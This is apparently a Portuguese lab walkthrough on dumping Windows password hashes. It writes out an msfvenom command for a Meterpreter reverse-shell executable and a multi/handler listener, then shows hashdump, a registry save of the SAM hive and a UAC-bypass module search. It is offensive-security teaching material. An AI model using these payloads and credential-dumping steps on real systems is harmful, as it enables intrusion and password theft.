Obtendo hashes em sistemas modernos

Para começar, vamos criar um laboratório propício para iniciar os métodos de captura de hashes. Nesse caso não temos acesso privilegiado no sistema.

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.2.134 lport=443 -f exe > arq.exe
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <lhost>
set LPORT <lport>
exploit

Podemos tentar executar o hashdump porém como não temos acesso privilegiado, não será possível.

meterpreter > hashdump 
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Vamos tentar realizar uma função administrativa como, por exemplo salvar o SAM direto do registro. (hkml = HKEY-LOCAL-MACHINE)

C:\>reg save hklm\sam arqSam
ERROR: Access is denied.

Dá acesso negado, então é necessário escalar para um privilégio administrativo para que isso seja possível.

Vamos então procurar módulos para dar bypass no UAC (User Account Control). Para isso podemos usar o background sem matar a sessão.

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                             Connection
  --  ----  ----                     -----------                             ----------
  1         meterpreter x64/windows  DESKTOP-MJHCOMS\trzwo @ DESKTOP-MJHCOM  192.168.2.134:666 -> 192.168.2.137:612
                                     S                                       48 (192.168.2.137)

msf6 exploit(multi/handler) > search uac

Com isso, conseguimos dar bypass no UAC e obter os arquivos.

Com os dois arquivos, SAM e system, conseguimos as hashes utilizando o impacket-secretsdump

O mesmo ocorre se utilizarmos o hashdump do meterpreter também.

Last updated

Was this helpful?